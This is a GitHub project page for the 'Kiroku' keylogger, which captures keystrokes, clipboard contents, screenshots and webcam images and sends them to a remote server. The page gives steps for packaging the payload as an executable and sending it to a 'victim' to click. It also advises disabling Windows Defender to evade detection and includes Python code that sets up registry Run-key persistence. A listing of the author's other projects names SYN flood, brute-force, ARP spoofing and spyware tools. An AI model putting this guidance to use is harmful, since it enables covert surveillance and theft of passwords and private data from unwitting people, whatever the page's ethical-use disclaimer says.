Git Product home page Git Product logo

Kiroku Keylogger

GIF

Kiroku Keylogger is a sophisticated tool designed to capture and monitor a wide range of user activities on a target system. It is equipped to log keystrokes, monitor clipboard contents, and take periodic screenshots and webcam image, which are then transmitted to a remote server at regular intervals.

Payload Features

  • Keystroke Logging: Captures all keystrokes, including special keys like Enter, Tab, and Backspace, and sends them to a specified server.
  • Clipboard Monitoring: Continuously monitors clipboard content, detecting changes and sending the updated data to the server.
  • Screenshot Capture: Takes screenshots at regular intervals and sends them to the server in a base64-encoded format.
  • Webcam Image Capture: Takes webcam image at regular intervals and sends them to the server in a base64-encoded format also. (Not Compatible with Linux so we removed it)
  • Modifier Key Tracking: Tracks the state of Ctrl, Alt, and Shift keys to accurately capture key combinations.
  • Configurable Intervals: Allows customization of the intervals for sending keystrokes, clipboard data, and screenshots.
  • JSON Payloads: Packages keystrokes, clipboard data, and screenshots into JSON format for server transmission.
  • Threaded Execution: Runs keystroke logging, clipboard monitoring, and screenshot capture in separate threads for efficient performance.
  • Automatic Transmission: Periodically sends captured data to the server without user intervention.
  • Base64 Encoding: Encodes screenshots in base64 format before transmission to reduce the payload size.
  • Platform Compatibility: Designed to work seamlessly on multiple platforms with minimal configuration changes.

Server Features

  • Keystroke Logging: Receives and logs keystrokes from the payload, saving them to a specified file.
  • Clipboard Data Capture: Captures clipboard content from the payload and saves it to a specified file. Optionally logs clipboard data based on user preference.
  • Screenshot Handling: Receives base64-encoded screenshots from the payload, decodes them, and saves them as PNG files in a specified directory.
  • Webcam handling: Receives base64-encoded webcam images from the payload, decodes them, and saves them as a PNG files in a specified directory.
  • Victim IP Logging: Logs the IP address of the victim alongside captured data to identify the source.
  • JSON Parsing and Error Handling: Parses incoming data in JSON format and handles errors like invalid JSON or server issues with detailed logging.
  • Customizable Configuration: Allows customization of the server port, file paths for saved keystrokes, clipboard data, and screenshot storage directory.
  • Threaded Execution: Handles incoming POST requests concurrently, ensuring smooth and efficient server performance.
  • Logging: Provides detailed logging of all activities, including received data, errors, and server operations.
  • Session Persistence: Automatically reconnects and continues sessions if the server is restarted while the payload is still running, ensuring uninterrupted data capture.
  • Interactive Use: The server offers GUI Interface for more interactive and customizable listening.

Installation && Usage

  • Clone the repository:

    git clone https://github.com/Kuraiyume/Kiroku

  • Install the necessary libraries:

    pip3 install -r requirements.txt

    You will need to install this in the victim's machine

  • On the attacker machine, run the server:

    python3 server.py

    If Tkinter is not installed, install it using 'sudo apt install python3-tk'

  • On the victim device configure the payload and run the script:

    python3 payload_windows.py

    If your target is Linux machine:

    python3 payload_linux.py

How to make the payload run without the need of Python Interpreter?

  • You will need to install the required modules for the payload:

    pip3 install -r requirements.txt

    Ensure that all of the modules are installed!

  • Configure the payload before we turn it to executable, change the server IP, Port, and the time intervals (if needed).

  • We will use PyInstaller to convert our payload to a standalone executable (PyInstaller is included in the requirements.txt).

  • We will use the 'payload.spec' file to convert our payload to executable, but first, configure it on how your executable should be packed based on your requirements.

  • After Configuration, we will use PyInstaller along with the payload.spec to generate us an executable version of the payload:

    pyinstaller payload_windows.spec

    If your target is Linux machine:

    pyinstaller payload_linux.spec

    Make sure to build the executable on the same OS as the target system to avoid compatibility issues due to architecture differences. If you're building the executable on windows, you should turn off the Real-Time Protection in Windows Defender to avoid detection while building.

  • Once the conversion is done, you will see a dist folder that's where your executable lives. Now all you need to do is run the server on the attacker's machine and send the executable to the victim and wait for the victim to click it, once clicked, the payload will do its work.

    Ensure all configurations made before the conversion are correct and match the attacker's machine setup.

  • (Windows Only) If you want to make it persistent when you convert it to executable, you'll need to add a logic in the payload that can move itself to the windows registry when it's executable, Here's how you can do that:

    1. Import the winreg and sys module to allow your payload to integrate with the registry and file system (sys): 
      import winreg
import sys
    2. Add this function: 
      def add_to_registry():
    exe_path = sys.executable
    try:
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_SET_VALUE)
        key_name = 'Kiroku'
        winreg.SetValueEx(registry_key, key_name, 0, winreg.REG_SZ, exe_path)
        winreg.CloseKey(registry_key)
    except Exception as e:
        print(f"Failed to add executable to registry: {e}")
    3. Call the function to the main guard (AT THE BEGINNING): 
      if __name__ == "__main__":
    add_to_registry()

Warning

This tool is intended strictly for educational purposes and ethical hacking only. Unauthorized use of this tool for malicious activities or without explicit consent is illegal and strictly prohibited.

  • Ethical Use Only: Ensure that you have proper authorization before deploying or using this tool. It is meant to help understand security vulnerabilities and improve defenses, not to invade privacy or engage in unlawful activities.
  • Legal Compliance: Be fully aware of and comply with all applicable laws and regulations in your jurisdiction. Misuse of this tool can result in severe legal consequences.
  • Responsibility: The creator of this tool does not condone or support illegal activities. Use this tool responsibly and ethically to advance your knowledge and skills in cybersecurity.

Proceed with caution and integrity. Your actions reflect your respect for privacy and the law.

License

  • Kiroku is licensed under the GNU General Public License.

Author

  • A1SBERG

DarkSeraph's Projects

akari icon akari

Akari is a robust and versatile DNS enumeration tool, it provides a comprehensive set of features to perform detailed DNS lookups, making it an invaluable tool for both reconnaissance and troubleshooting.

denko icon denko

Denko is a web crawler designed to automatically navigate through websites, extract and categorize links, and provide a structured view of the web content. With its ability to handle multi-threaded operations, Denko is a powerful tool for web scraping, site analysis, and link discovery.

haruko icon haruko

HARUKO is a robust tool designed to generate customizable password wordlists for brute-force attacks

henko icon henko

Henko is a Python script designed to change the MAC address of network interfaces on Linux systems. It supports generating random MAC addresses, specifying a custom MAC address, and reverting to the original MAC address.

homework_picoctf icon homework_picoctf

This is how I hacked homework from picoCTF Binary Exploitation - Hard Difficulty

jinro icon jinro

Jinro is a simple SYN flood script written in Python using Scapy. It allows you to perform SYN flood attacks by sending a high volume of SYN packets to a target IP address and port.

kechi icon kechi

Kechi is a DHCP starvation tool that sends DHCP discover packets to deplete DHCP resources on a network. It utilizes Scapy to craft and transmit packets.

kiroku icon kiroku

Kiroku Keylogger is a sophisticated tool designed to capture and monitor a wide range of user activities on a target system. It is equipped to log keystrokes, monitor clipboard contents, take periodic screenshots and webcam images, which are then transmitted to a remote server at regular intervals.

kudo icon kudo

Kudo is a versatile decoding toolkit that provides a range of algorithms to handle different types of encoded data. It simplifies the process of decrypting and decoding various formats, making it easier to work with both simple and complex data. With its user-friendly design, Kudo helps you efficiently manage and interpret data.

mira icon mira

Zephyr introduces Mira. Mira is our innovative password management solution designed specifically for the command-line interface (CLI). With a streamlined and efficient approach, Mira provides a robust solution to the vulnerabilities associated with password management in the digital era.

mitsuki icon mitsuki

Mitsuki is a Python script designed for brute-forcing SSH, FTP, and MySQL/mariaDB services. It utilizes multithreading to efficiently try multiple passwords from a specified wordlist against a target server.

nethermath icon nethermath

NetherMath is a terminal-based calculator, designed for faster conversions and more.

passforge icon passforge

An Advanced Password Generator that generates customizable passwords with sophisticated options.

reverse-shell-payloads icon reverse-shell-payloads

This repository contains all of the payloads I've used in my CTFs, some of this are not working in latest Operating Systems but in CTF situations, they do the work. Just don't ever use this for something fishy. Please use this payloads at your own risk.

seiryu icon seiryu

Seiryu is an advanced command-line utility designed for sophisticated password hashing, offering a comprehensive set of features and algorithms to bolster security. Below, you'll find an in-depth guide on Seiryu's features, advanced usage, supported algorithms, and practical examples.

sokushi icon sokushi

Sokushi Spyware, developed by A1SBERG, is a potent surveillance tool that establishes a remote connection between the victim's system and the attacker's server.

tsniff icon tsniff

TSNIFF by Veilwr4ith is a versatile packet sniffer utilizing tcpdump and tshark for capturing and analyzing network traffic. This tool allows for real-time monitoring, traffic capture, and detailed analysis of captured packets.

woofer icon woofer

This Python script enables ARP spoofing attacks on local networks, allowing for various security testing and network reconnaissance purposes. Use responsibly and with caution, ensuring proper authorization and safeguards are in place.

xiore icon xiore

The Xiore Cipher is a proprietary symmetric encryption algorithm designed for robust data security. It operates with a 256-bit key and employs multiple rounds of encryption to secure plaintext data.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.